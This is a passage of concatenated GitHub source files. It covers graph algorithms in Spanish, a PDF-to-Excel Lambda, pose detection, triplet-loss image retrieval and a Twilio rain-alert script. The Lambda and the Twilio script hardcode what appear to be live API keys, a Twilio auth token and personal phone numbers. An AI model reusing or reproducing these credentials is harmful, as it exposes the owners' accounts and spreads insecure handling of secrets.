arcosVisitados.add((vertice, vecino))\n stack.append(vecino.verticeFinal)\n return visitados\n\n def grafoConexo(self):\n lista = []\n arcosVisitados = set()\n for inicio in self.__listaVertices:\n visitadosInicio = self.__dfsConexo(inicio, arcosVisitados)\n lista.append(visitadosInicio)\n if len(visitadosInicio) == len(self.__listaVertices):\n arcosVisitados = set()\n continue\n else:\n return False\n return True\n \n # 1. Determinar si existe un camino válido entre dos vértices\n def caminoEntreDosVertices(self, inicio, fin):\n if self.existenAmbosVertices(inicio, fin) is None:\n return None\n pila = [(inicio, [])]\n visitados = set()\n while pila:\n vertice, arcosVisitados = pila.pop()\n if vertice == fin:\n return True\n if vertice not in visitados:\n visitados.add(vertice)\n arco: Arco\n for arco in self.__listaVertices[vertice]:\n if arco.verticeFinal not in visitados:\n pila.append((arco.verticeFinal, arcosVisitados + [arco]))\n return False\n \n # 2. Determinar si el grafo tiene, al menos un ciclo\n def __dfsUnCicloSimple(self, vertice, visitados:set, explorados=None, padre=None):\n if explorados is None:\n explorados = set()\n visitados.add(vertice)\n explorados.add(vertice)\n w: Arco \n for w in self.__listaVertices[vertice]:\n if w.verticeFinal in explorados and w.verticeFinal != padre:\n return True\n elif w.verticeFinal not in visitados:\n if self.__dfsUnCicloSimple(w.verticeFinal, visitados, explorados, vertice):\n return True\n explorados.remove(vertice)\n return False\n\n def alMenosUnCicloSimple(self):\n visitados = set()\n for vertice in self.__listaVertices:\n if vertice not in visitados:\n if self.__dfsUnCicloSimple(vertice, visitados):\n return True\n return False\n \n # 3. Determinar si el grafo es fuertemente conexo\n def grafoFuertementeConexo(self):\n if not self.grafoDirigido():\n return False\n return self.grafoConexo()\n \n # 4. Determinar si el grafo es completo\n def grafoCompleto(self):\n if not self.grafoNoDirigido():\n return False\n for verticeInicial in self.verVertices():\n for verticeFinal in self.verVertices():\n if verticeInicial == verticeFinal:\n continue\n if self.sonAdyacentes(verticeInicial, verticeFinal) or self.sonAdyacentes(verticeFinal, verticeInicial):\n continue\n else:\n return False\n return True\n\n\nclass Dijkstra:\n def __init__(self, grafo: ListaAdyacencia, verticeInical) -> None:\n self.__verticesUbicados = set()\n self.__verticesSinUbicar = set()\n self.__distancia = dict()\n self.__predecesores = dict()\n self.__verticeInicial = verticeInical\n self.__grafo = grafo\n\n def __calcularDistanciaMasCorta(self, vertice):\n distanciaVertice = self.__distancia.get(vertice)\n if distanciaVertice is None:\n return sys.maxsize\n else:\n return distanciaVertice\n \n def __buscarMinimo(self, vertices):\n verticeMinimo = None\n for verticeActual in vertices:\n if verticeMinimo is None:\n verticeMinimo = verticeActual\n else:\n if self.__calcularDistanciaMasCorta(verticeActual) < self.__calcularDistanciaMasCorta(verticeMinimo):\n verticeMinimo = verticeActual\n return verticeMinimo\n \n def __buscarDistanciasMinimas(self, vertice):\n arco: Arco\n adyacentes = self.__grafo.buscarVertice(vertice)\n for arco in adyacentes:\n verticeAdyacente = arco.verticeFinal\n if self.__calcularDistanciaMasCorta(verticeAdyacente) > self.__calcularDistanciaMasCorta(vertice) + arco.peso:\n self.__distancia[verticeAdyacente] = self.__calcularDistanciaMasCorta(vertice) + arco.peso\n self.__predecesores[verticeAdyacente] = vertice\n self.__verticesSinUbicar.add(verticeAdyacente)\n \n def inicializarDijikstra(self):\n self.__distancia[self.__verticeInicial] = 0\n self.__verticesSinUbicar.add(self.__verticeInicial)\n while self.__verticesSinUbicar:\n mejorVertice = self.__buscarMinimo(self.__verticesSinUbicar)\n self.__verticesUbicados.add(mejorVertice)\n self.__verticesSinUbicar.remove(mejorVertice)\n self.__buscarDistanciasMinimas(mejorVertice)\n\n def obtenerCamino(self, verticeFinal):\n caminoEncontrado = []\n verticeActual = verticeFinal\n if self.__predecesores.get(verticeActual) is None:\n return None\n caminoEncontrado.append(verticeActual)\n while self.__predecesores.get(verticeActual):\n verticeActual = self.__predecesores[verticeActual]\n caminoEncontrado.append(verticeActual)\n caminoEncontrado.reverse()\n return caminoEncontrado\n\n# - - - - - Prueba - - - - -\n\nlista_01 = ListaAdyacencia() # Dirigido + no conexo\nlista_01.adicionarVertice(\"A\")\nlista_01.adicionarVertice(\"B\")\nlista_01.adicionarVertice(\"C\")\nlista_01.adicionarVertice(\"D\")\nlista_01.adicionarArco(\"A\", \"B\", 2)\nlista_01.adicionarArco(\"B\", \"C\", 3)\nlista_01.adicionarArco(\"C\", \"D\", 2)\nlista_01.adicionarArco(\"D\", \"B\", 1)\n\nprint(f\"Grafo 01: {lista_01}\")\nprint(f\"¿Hay un camino de 'A' a 'D'?: {lista_01.caminoEntreDosVertices('A', 'D')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_01.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_01.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_01.grafoCompleto()}\\n\")\n\nlista_02 = ListaAdyacencia() # No dirigido + conexo\nlista_02.adicionarVertice(\"A\")\nlista_02.adicionarVertice(\"B\")\nlista_02.adicionarVertice(\"C\")\nlista_02.adicionarVertice(\"D\")\nlista_02.adicionarArco(\"A\", \"B\", 2)\nlista_02.adicionarArco(\"B\", \"A\", 2)\nlista_02.adicionarArco(\"A\", \"C\", 2)\nlista_02.adicionarArco(\"C\", \"A\", 2)\nlista_02.adicionarArco(\"A\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"A\", 2)\nlista_02.adicionarArco(\"B\", \"C\", 2)\nlista_02.adicionarArco(\"C\", \"B\", 2)\nlista_02.adicionarArco(\"B\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"B\", 2)\nlista_02.adicionarArco(\"C\", \"D\", 2)\nlista_02.adicionarArco(\"D\", \"C\", 2)\n\nprint(f\"Grafo 02: {lista_02}\")\nprint(f\"¿Hay un camino de 'D' a 'B'?: {lista_02.caminoEntreDosVertices('D', 'B')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_02.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_02.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_02.grafoCompleto()}\\n\")\n\nlista_03 = ListaAdyacencia() # Dirigido + conexo\nlista_03.adicionarVertice(\"A\")\nlista_03.adicionarVertice(\"B\")\nlista_03.adicionarVertice(\"C\")\nlista_03.adicionarVertice(\"D\")\nlista_03.adicionarVertice(\"E\")\n\nlista_03.adicionarArco(\"A\", \"B\", 2)\nlista_03.adicionarArco(\"B\", \"C\", 3)\nlista_03.adicionarArco(\"B\", \"E\", 2)\nlista_03.adicionarArco(\"C\", \"D\", 4)\nlista_03.adicionarArco(\"D\", \"A\", 1)\nlista_03.adicionarArco(\"E\", \"D\", 3)\n\nprint(f\"Grafo 03: {lista_03}\")\nprint(f\"¿Hay un camino de 'D' a 'E'?: {lista_03.caminoEntreDosVertices('D', 'E')}\")\nprint(f\"¿Hay al menos un ciclo simple?: {lista_03.alMenosUnCicloSimple()}\")\nprint(f\"¿Es fuertemente conexo?: {lista_03.grafoFuertementeConexo()}\")\nprint(f\"¿Es completo?: {lista_03.grafoCompleto()}\")\n","repo_name":"jesusdominguez2004/pruebas","sub_path":"algoritmos-2/semana-09/taller02.py","file_name":"taller02.py","file_ext":"py","file_size_in_byte":18302,"program_lang":"python","lang":"es","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"19094632739","text":"import io\nimport base64\nimport json\nfrom time import sleep\nimport csv\nfrom itertools import chain\n\nimport requests\nimport pandas\n\nFILE_UPLOAD_HTML = \"\"\"\nConvert PDF to .xlsx\n
\n
\n Select image to upload:\n \n \n
\n\"\"\"\n\nSTART_CONVERSION_URL = \"http://api.convertio.co/convert\"\nAPI_KEY = \"608745a3c9efe0236d0369f591d304ee\"\nGET_CONVERSION_STATUS_URL = \"https://api.convertio.co/convert/{id}/status\"\nGET_CONVERTED_FILE_URL = \"https://api.convertio.co/convert/{id}/dl\"\nSLEEP_TIME = 10\n\nlevel_1_destination_delimiter = '^level_1^'\nlevel_2_destination_delimiter = '^level_2^'\nto_replace = {\"Актуальна інформація про об’єкт нерухомого майна\": level_1_destination_delimiter,\n \"ВІДОМОСТІ ПРО ОБ’ЄКТ НЕРУХОМОГО МАЙНА\": level_1_destination_delimiter,\n \"Відомості про права власності\": level_2_destination_delimiter,\n \"ВІДОМОСТІ ПРО ПРАВА ВЛАСНОСТІ\": level_2_destination_delimiter,\n \"Дата внесення запису\": level_2_destination_delimiter + \"Дата внесення запису\",\n chr(12): \"\"\n }\n\nmain_info_starts = [\"Реєстраційний номер\", ]\nown_info_starts = [\"Дата внесення запису\", \"Номер запису про право власності / довірчої власності\"]\nskippers = ['стор.', 'RRP-', 'ВІДОМОСТІ', \"З РЕЄСТРУ ПРАВ ВЛАСНОСТІ НА НЕРУХОМЕ МАЙНО\"]\n\nkey_substitution = {\"Реєстраційний номер об’єкта нерухомого майна:\": \"Реєстраційний номер майна:\",\n \"Об’єкт нерухомого майна:\": \"Тип майна:\",\n \"Загальна площа (кв.м):\": \"Площа:\",\n \"Адреса нерухомого майна:\": \"Адреса:\"\n }\n\ncsv_keys = list(key_substitution.values())\ncsv_keys.append(\"Власники\")\n\n\ndef pdf2txt(file_content):\n # file_content = base64.b64encode(file_content).decode('utf-8')\n result = requests.post(url=START_CONVERSION_URL,\n data=json.dumps({\"apikey\": API_KEY, \"input\": \"base64\", \"file\": file_content,\n \"filename\": \"in.pdf\", \"outputformat\": \"file_content\"}))\n\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n id = data['id']\n print(f\"Start conversion response: {data}\")\n\n while True:\n print(f\"Start sleeping for {SLEEP_TIME} seconds\")\n sleep(SLEEP_TIME)\n\n result = requests.get(url=GET_CONVERSION_STATUS_URL.format(id=id))\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n print(f\"Conversion status response: {data}\")\n\n if data['step'] == 'finish':\n break\n\n result = requests.get(url=GET_CONVERTED_FILE_URL.format(id=id))\n if result.status_code != 200:\n raise Exception(result.text)\n\n data = result.json()['data']\n if data.get('error'):\n print(f\"Conversion error: {data.get('error')}\")\n raise Exception(data.get('error'))\n\n return base64.b64decode(data['content']).decode('utf-8')\n\n\ndef txt2dict(file_content: str):\n def _cut_starts(data, templates):\n for template in templates:\n if template in data:\n return data[data.index(template):]\n return data\n\n def _skip_unneeded_items(record, unneeded_items):\n result_record = []\n for line in record:\n\n new_line = []\n for block in line:\n skip_block = any(filter(lambda x: (x in block) or (not block.strip()), unneeded_items))\n if skip_block:\n continue\n new_line.append(block)\n\n result_record.append(new_line)\n\n return result_record\n\n def _cleanup_record(record):\n result_record = []\n for line in record:\n new_line = [block for block in line if block.strip()]\n if new_line:\n result_record.append(new_line)\n\n return result_record\n\n def _build_dict_record(record):\n main_info_block = record[0]\n\n key_parts = [item[:item.index(':') + 1].strip() if ':' in item else item[:25].strip() for item in\n main_info_block]\n value_parts = [item[item.index(':') + 1:].strip() if ':' in item else item[25:].strip() for item in\n main_info_block]\n\n key_index = 0\n key = ''\n keys = []\n for key_part in key_parts:\n key_index += 1\n key += key_part + ' '\n if ':' in key_part:\n keys.append((key.strip(), key_index))\n key = ''\n key_index = 0\n\n if key:\n keys.append((key.strip(), key_index))\n\n fixed_keys = []\n\n offset = 0\n for index in range(len(keys) - 1, -1, -1):\n if not keys[index][0]:\n offset += 1\n else:\n fixed_keys.append((keys[index][0], keys[index][1] + offset))\n offset = 0\n\n record[0] = {}\n\n index = 0\n fixed_keys.reverse()\n for key, cnt in fixed_keys:\n record[0][key] = ' '.join(value_parts[index:index + cnt])\n index += cnt\n\n return record\n\n def _build_dict_records(records):\n return [_build_dict_record(record) for record in records]\n\n for from_what, to_what in to_replace.items():\n file_content = file_content.replace(from_what, to_what)\n\n file_content = file_content.split(level_1_destination_delimiter)[1:]\n\n records = []\n\n for block in file_content:\n data = block.split(level_2_destination_delimiter)\n\n record = [_cut_starts(data[0], main_info_starts).split('\\n'),\n *[_cut_starts(owner, own_info_starts).split('\\n') for owner in data[1:]]]\n\n record = _skip_unneeded_items(record, skippers)\n record = _cleanup_record(record)\n if record:\n records.append(record)\n\n records = _build_dict_records(records)\n\n for record in records:\n record[0] = {key_substitution.get(key, key): value for key, value in record[0].items()}\n record[0]['Власники'] = chr(10).join(chain(*record[1:]))\n del record[1]\n\n return [record[0] for record in records]\n\n\ndef dict2csv(data):\n result_string = io.StringIO('')\n writer = csv.DictWriter(result_string, fieldnames=csv_keys, quoting=csv.QUOTE_ALL)\n writer.writerows(data)\n\n result_string.seek(0)\n return result_string.read()\n\n\ndef dict2xlsx(data):\n df = pandas.DataFrame(data)\n result_stringresult = io.BytesIO()\n df.to_excel(result_stringresult)\n return result_stringresult\n\n\ndef pdf2xlsx(pdf_data):\n data = txt2dict(pdf2txt(pdf_data))\n return dict2xlsx(data)\n\n\ndef lambda_handler(event, context):\n method = event['requestContext']['http']['method']\n if method == 'GET':\n return {\n 'statusCode': 200,\n 'headers': {'content-type': 'text/html'},\n 'body': FILE_UPLOAD_HTML\n }\n elif method == 'POST':\n return {\n 'statusCode': 200,\n 'headers': {'content-type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'},\n 'body': pdf2xlsx(event['requestContext']['body'])\n }\n\n return {\n 'statusCode': 400,\n 'content-type': 'text/html',\n 'body': f\"Unsupported HTTP method {method}. Correct are: GET, POST\"\n }\n","repo_name":"TarasTG/PythonGarbage","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10673348289","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport csv\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport os \nimport sys\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\ndef joint_extraction(results):\n joint_dict = {}\n for i, landmark in enumerate(results.pose_landmarks.landmark):\n joint_dict[f'Joint {i}'] = {'X': landmark.x, 'Y': landmark.y, 'Z': landmark.z}\n return joint_dict\n\nclass pose_detection:\n def __init__(self):\n # Initialize mediapipe pose solution\n self.mp_pose = mp.solutions.pose\n self.mp_draw = mp.solutions.drawing_utils\n self.pose = self.mp_pose.Pose()\n\n def pose_estimation(self, image_path: str, pose_show=True, extracted_pose=True,\n return_joints=True, save_csv=True):\n # Read the image\n img = cv2.imread(image_path)\n # Resize the image for better processing (optional)\n img = cv2.resize(img, (600, 400))\n\n # Perform pose detection\n self.results = self.pose.process(img)\n\n if self.results is None:\n print(\"Pose detection failed.\")\n return None\n if self.results.pose_landmarks is None:\n print(\"Pose detection failed or no landmarks detected.\")\n return None\n\n\n # Create a blank image with white background\n h, w, c = img.shape\n opimg = np.zeros([h, w, c], dtype=np.uint8)\n opimg.fill(255)\n\n # Draw the extracted pose on the blank image\n self.mp_draw.draw_landmarks(opimg, self.results.pose_landmarks, self.mp_pose.POSE_CONNECTIONS,\n self.mp_draw.DrawingSpec((255, 0, 0), 2, 2),\n self.mp_draw.DrawingSpec((255, 0, 255), 2, 2))\n if pose_show:\n # Display the original image with pose estimation\n cv2.imshow(\"Pose Estimation\", img)\n\n if extracted_pose:\n # Display the extracted pose on a blank image\n cv2.imshow(\"Extracted Pose\", opimg)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if return_joints:\n # Extract joint locations\n joint_locations = []\n for landmark in self.results.pose_landmarks.landmark:\n joint_locations.append((landmark.x, landmark.y, landmark.z))\n if save_csv:\n # Save the joint positions and other details to a CSV file\n csv_file = \"pose_details.csv\"\n with open(csv_file, mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"Joint\", \"X\", \"Y\", \"Z\"]) # Header row\n for i, joint in enumerate(joint_locations):\n writer.writerow([f\"Joint {i}\", joint[0], joint[1], joint[2]])\n return joint_extraction(self.results)\n else:\n return None\n","repo_name":"shiv2398/Body_measurments_using_Pose-Detection","sub_path":"pose_detection_model/pose_detetion.py","file_name":"pose_detetion.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70505942875","text":"\"\"\"Module for Custom_Error exception\"\"\"\n\nfrom typing import Literal\n\n\nclass Custom_Error(Exception):\n \"\"\"Implement custom exceptions with this class\"\"\"\n\n def __init__(self, message: str, cause: Literal[\"Authentication\", \"Database\"], status_code: int, **kwargs) -> None:\n self.message = message\n self.cause = cause\n self.status_code = status_code\n self.__dict__.update(kwargs)\n self.formated = dict(message=message, cause=cause, **kwargs), status_code\n super().__init__(self.__dict__)\n\n def __repr__(self):\n return f\"<{type(self)} message={self.message} cause={self.cause}>\"\n","repo_name":"Juli03b/groupypay","sub_path":"exceptions/Custom_Error.py","file_name":"Custom_Error.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3187637735","text":"from keras.applications.vgg16 import VGG16\n# from keras.applications.vgg16 import preprocess_input\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Flatten, Embedding, Dense, GlobalAveragePooling2D, Lambda\nfrom keras import backend as K\n# import keras\nfrom keras.models import load_model\nimport random\n# import keras.backend.tensorflow_backend as KTF\n\nimport numpy as np\nfrom glob import glob\nimport os\nimport sys\nimport time\n\n# import pandas as pd\nimport logging\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\n\n\n# argv[]\n# argv[1] : input directory for test_anchor\n# argv[2] : input directory for test_positive\n# argv[3] : epoch_num(max)\n# argv[4] : model(.hd5) directory\n\ndef identity_loss(y_true, y_pred):\n return K.mean(y_pred - 0 * y_true)\n\ndef visualize_vec(vec):\n anchor, positive, negative = vec\n print(\"anchor = {}\".format(anchor))\n # この下にt-sneを書いていきたい\n\ndef triplet_loss(vec, alpha = 0.2):\n visualize_vec(vec)\n\n anchor, positive, negative = vec\n d_p = K.sum(K.square(anchor - positive), axis = -1)\n d_n = K.sum(K.square(anchor - negative), axis = -1)\n loss = K.mean(K.maximum(0.0, d_p -d_n + alpha ))\n return loss\n\ndef top5(rank_dist, rank_index, new, index, filename, top5name):\n for i, dist in enumerate(rank_dist):\n if float(new) < dist:\n for frame in rank_index:\n if index in range(frame-30, frame+30):\n return rank_dist, rank_index, top5name\n\n rank_dist.insert(i, float(new))\n rank_dist.pop(5)\n rank_index.insert(i, index)\n rank_index.pop(5)\n top5name.insert(i, os.path.abspath(filename))\n top5name.pop(5)\n\n return rank_dist, rank_index, top5name\n\n return rank_dist, rank_index, top5name\n\n\ndef top20(rank_dist, rank_index, new, index, filename, top5name):\n for i, dist in enumerate(rank_dist):\n if float(new) < dist:\n for frame in rank_index:\n if index in range(frame-20, frame+20):\n return rank_dist, rank_index, top5name\n\n rank_dist.insert(i, float(new))\n rank_dist.pop(20)\n rank_index.insert(i, index)\n rank_index.pop(20)\n top5name.insert(i, os.path.abspath(filename))\n top5name.pop(20)\n\n return rank_dist, rank_index, top5name\n\n return rank_dist, rank_index, top5name\n\n\ndef top500(rank_dist, rank_index, new, index):\n for i, score in enumerate(rank_dist):\n if float(new) < score:\n rank_dist.insert(i, float(new))\n rank_dist.pop(500)\n rank_index.insert(i, index)\n rank_index.pop(500)\n\n return rank_dist, rank_index\n\n return rank_dist, rank_index\n\ndef confidence_graph(confidences, order_num):\n fig = plt.figure(figsize=(200, 10))\n plt.xlabel(\"frame\")\n plt.ylabel(\"confidence\")\n plt.rcParams[\"font.size\"] = 16\n # plt.legend([\"confidence\"], loc= loc=\"upper right\")\n\n frames = range(len(confidences))\n num = 100 #移動平均の個数\n b = np.ones(int(num))/num\n ido = np.convolve(confidences, b, mode='same')#移動平均\n\n plt.xlim(0, len(confidences))\n plt.ylim(0.5, 1.0)\n\n plt.plot(frames, confidences, \"r\",linewidth=1, linestyle=\"-\", label=\"conf\")\n plt.plot(frames, ido, \"b\",linewidth=10, linestyle=\"-\", label=\"moving average (n = {})\".format(int(num)))\n plt.legend(fontsize=18)\n\n plt.savefig(\"confidence_order{}.pdf\".format(order_num),bbox_inches=\"tight\")\n\n\ndef create_base_network(model_name):\n model_name = 'inception'\n if model_name == 'vgg16':\n vgg_model = VGG16(include_top=False, weights='imagenet')\n model = Model(input = vgg_model.input, output = vgg_model.output)\n elif model_name == 'inception':\n inception_model = InceptionV3(weights='imagenet', include_top=False)\n x = inception_model.get_layer('mixed5').output\n x = GlobalAveragePooling2D()(x)\n\n\n x = Dense(1024, activation='relu')(x)\n x = Dense(128)(x)\n model = Model(input = inception_model.input, output = x)\n return model\n\ndef triplet_output_shape(shapes):\n shape1, shape2, shape3 = shapes\n return (shape1[0], 1)\n\ndef build(base_model, input_shape=(224, 224,3)):\n anchor = Input(shape=input_shape, name='input_anchor')\n positive = Input(shape=input_shape, name='input_positive')\n negative = Input(shape=input_shape, name='input_negative')\n out_a = base_model(anchor)\n out_p = base_model(positive)\n out_n = base_model(negative)\n\n loss = Lambda(triplet_loss,\n output_shape=triplet_output_shape,\n name='triplet_loss')([out_a, out_p, out_n])\n\n return Model(input=[anchor, positive, negative], output=loss)\n\ndef build_predict(base_model, input_shape=(224, 224,3)):\n input_img = Input(shape=input_shape)\n out = base_model(input_img)\n return Model(input=input_img, output=out)\n\ndef get_img(name):\n img = image.load_img(name, target_size=(224, 224))\n x = image.img_to_array(img)\n return x\n\ndef test():\n # ログの出力名を設定(1)\n logger = logging.getLogger('LoggingTest')\n\n # ログレベルの設定(2)\n logger.setLevel(20)\n # ログレベル以下のログは標準出力に表示されない\n # NOTSET\t0\t設定値などの記録(全ての記録)\n # DEBUG\t10\t動作確認などデバッグの記録\n # INFO\t20\t正常動作の記録\n # WARNING\t30\tログの定義名\n # ERROR\t40\tエラーなど重大な問題\n # CRITICAL\t50\t停止など致命的な問題\n\n # ログのファイル出力先を設定(3)\n now = time.ctime()\n parsed = time.strptime(now)\n fh = logging.FileHandler('output_value2_{}.log'.format(time.strftime(\"%Y%m%d_%H:%M:%S\", parsed)))\n logger.addHandler(fh)\n\n # ログのコンソール出力の設定(4)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n\n model_name = 'inception'\n base_model = create_base_network(model_name)\n if K.image_data_format() == 'channels_first':\n input_shape = (3, 224, 224)\n else:\n input_shape = (224, 224, 3)\n model = build_predict(base_model, input_shape=input_shape)\n model.summary()\n\n # glob対象が複数の場合はこっち\n # dlist_v1 = glob(os.path.join(sys.argv[1], '*'))\n # dlist_v2 = glob(os.path.join(sys.argv[2], '*'))\n\n # glob対象が単一ディレクトリの場合はこっち\n dlist_v1 = []\n dlist_v2 = []\n dlist_v1.append(sys.argv[1])\n dlist_v2.append(sys.argv[2])\n\n dlist_v1.sort()\n dlist_v2.sort()\n\n key_indexs = []\n top5Corrects = []\n allepoch_top5filenames = []\n\n # 全部のepochいじるときはfor文を有効に\n for epoch in range(int(sys.argv[3])):\n epoch = str(epoch+1).zfill(2)\n logger.log(30, 'epoch {}'.format(epoch))\n\n model.load_weights('{}/weights.{}.hd5'.format(sys.argv[4], epoch))\n\n query = 0\n correct = 0\n all_distances = []\n all_confidences = []\n epoch_top5Indexes = []\n epoch_top5filenames = []\n\n for dirs in zip(dlist_v1, dlist_v2):\n flist_v1 = glob(os.path.join(dirs[0], '*.png'))\n flist_v2 = glob(os.path.join(dirs[1], '*.png'))\n flist_v1.sort()\n flist_v2.sort()\n logger.log(30, '{} {}'.format(len(flist_v1), len(flist_v2)))\n query += len(flist_v1)\n\n q_feats = []\n for index, img in enumerate(flist_v2):\n if index%500 == 0:\n # print(\"flist_v2\", j)\n logger.log(30, \"flist_v2 {}\".format(index))\n q_img = get_img(img)\n q_img = np.expand_dims(q_img, axis=0)\n q_feat = model.predict(q_img,batch_size=1)\n q_feats.append(q_feat)\n\n min_index = 0\n file = open(\"query.json\", \"w\")\n json.dump(flist_v1, file)\n # -----------------------------------\n for i, ref in enumerate(flist_v1):\n # 手順画像ごとに実行\n\n # top5\n rank_dist = [1000,1000,1000,1000,1000]\n rank_index = [0,0,0,0,0]\n top5_filename = [\"\",\"\",\"\",\"\",\"\"]\n\n # top20\n # rank_dist = []\n # rank_index = []\n # top5_filename = []\n # for i in range(20):\n # rank_dist.append(100)\n # rank_index.append(0)\n # top5_filename.append(\"\")\n\n # -----------------------------\n\n ref_img = get_img(ref)\n ref_img = np.expand_dims(ref_img, axis=0)\n r_feat = model.predict(ref_img,batch_size=1)\n\n min_dist = 1000\n nn = 0\n confidences = []\n distances = []\n\n for j in range(min_index, len(q_feats)):\n dist = np.linalg.norm( r_feat[0] - q_feats[j][0])\n\n # 手順画像に対してフレーム1枚ごとに実行\n # フレーム数分だけforが回る\n\n # top1\n if dist < min_dist:\n min_dist = dist\n nn = j\n\n distances.append(dist)\n confidences.append(1.0 - dist)\n\n # top5\n rank_dist, rank_index, top5_filename = top5(rank_dist, rank_index, dist, j, flist_v2[j], top5_filename)\n\n # confidence_graph(confidences, i)\n all_distances.append(distances)\n all_confidences.append(confidences)\n\n na = np.array(all_confidences, dtype=np.float)\n\n # top1\n logger.log(30, '{} {} {}'.format(i+1, nn, min_dist))\n file_index = (os.path.basename(flist_v2[nn])).split('.')[0]\n key_indexs.append(int(file_index))\n logger.log(30, 'query = {}'.format(ref))\n logger.log(30, 'top1 = {}'.format(flist_v2[nn]))\n\n # top5\n logger.log(30, 'rank_dist = {} \\nrank_index = {}'.format(rank_dist, rank_index))\n epoch_top5Indexes.append(rank_index)\n epoch_top5filenames.append(top5_filename)\n for i, name in enumerate(top5_filename):\n logger.log(30, \"top{} {}\".format(i+1, name))\n\n # このインデントは1つの手順画像が終わるごと\n # このインデントは全部の手順画像が終わったとき\n # このインデントはepochが終わった時\n allepoch_top5filenames.append(epoch_top5filenames)\n # logger.log(30, allepoch_top5filenames)\n # このインデントは全てのepochが終わった時\n\n # path = nx.dijkstra_path(make_tensor(all_distances, len(flist_v1), 0.6), 0, len(flist_v1)*len(flist_v2))\n\n # order_path = []\n # now = -1\n # for i, pa in enumerate(path):\n # pa = pa % len(flist_v1)\n # if now != pa:\n # now = pa\n # print(i)\n # order_path.append(pa)\n #\n # print(\"order_path = \",order_path)\n\n logger.log(30,\"key_indexs = {}\".format(key_indexs))\n\n # import value2_top5_186 as value186\n # import value2_top5_112 as value112\n # import value2_top5_186_017 as value186_017\n # import value2_top5_112_017 as value112_017\n #\n # top5Correct = value186.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value112.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value186_017.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value112_017.calcAccuracy(epoch_top5Indexes, logger)\n\n # logger.log(30, \"top5_correct = {}\".format(top5Correct))\n # top5Corrects.append(top5Correct)\n # logger.log(30, top5Corrects)\n\n file = open(\"candidate.json\", \"w\")\n json.dump(allepoch_top5filenames, file)\n\n\n\nif __name__ == '__main__':\n # train_aug()\n test()\n\n#model.fit_generator(...)\n","repo_name":"ryosism/tcn_tripletloss","sub_path":"src/tcn_tripletloss_value2.py","file_name":"tcn_tripletloss_value2.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22719921416","text":"import requests\nfrom twilio.rest import Client\n\n# Autentificações para sms\naccount_sid = \"AC2fc1a3198702a13e0e104bb875182ba0\"\nauth_token = \"2ab0760e826e1fab9619cbca1ad4e82c\"\n\n# Autentificações para status do clima\nAPI_KEY = \"7dd0bddc5dc816205b464703f9a689c6\"\nMINHA_LATITUDE = -19.949250\nMINHA_LONGITUDE = -43.929296\n\nPARAMETROS = {\n \"lat\": MINHA_LATITUDE,\n \"lon\": MINHA_LONGITUDE,\n \"appid\": API_KEY,\n}\n\nrequisicao = requests.get(url = f\"https://api.openweathermap.org/data/2.5/forecast?lat=44.34&lon=10.99&appid=7dd0bddc5dc816205b464703f9a689c6\") # pega a previsão do tempo dos próximos 5 dias com dados com distância de 3h\nrequisicao.raise_for_status()\n\ndados = requisicao.json()\n\nprevisao = dados[\"list\"][:5]\n\nlevar_guarda_chuva = False\n\nfor clima in previsao: #Verifica se terá chuva nas próximas 12h\n if clima[\"weather\"][0][\"id\"] < 700:\n levar_guarda_chuva = True\n\nif levar_guarda_chuva:\n client = Client(account_sid, auth_token)\n\n # Envia a mensagem SMS\n mensagem = client.messages.create(\n body=\"Vai Chover, leve um guarda chuva\",\n from_='+18156058589',\n to='+5531992889301'\n )\n\n print(mensagem.status)\n","repo_name":"TigoNunes/100-Days-of-Code","sub_path":"Notificador de chuva via SMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5437760859","text":"import re\nimport datetime\nimport pytz\nimport pymysql\nfrom operator import itemgetter\n\ndef read_file():\n list = []\n with open('github_url.text','r') as f:\n for line in f.readlines():\n str = line.strip()\n result = str.split('|')\n coin_id = result[0]\n coin_url = result[1]\n split_str = re.split('([/])', coin_url)\n dir = {}\n try:\n keyword = split_str[6] # 关键字\n except:\n continue\n dir['coin_id'] = coin_id\n dir['keyword'] = keyword\n list.append(dir)\n return list\n\n\ndef utc_to_local(utc_time_str, utc_format='%Y-%m-%dT%H:%M:%SZ'):\n local_tz = pytz.timezone('Asia/Chongqing')\n local_format = \"%Y-%m-%d %H:%M\"\n utc_dt = datetime.datetime.strptime(utc_time_str, utc_format)\n local_dt = 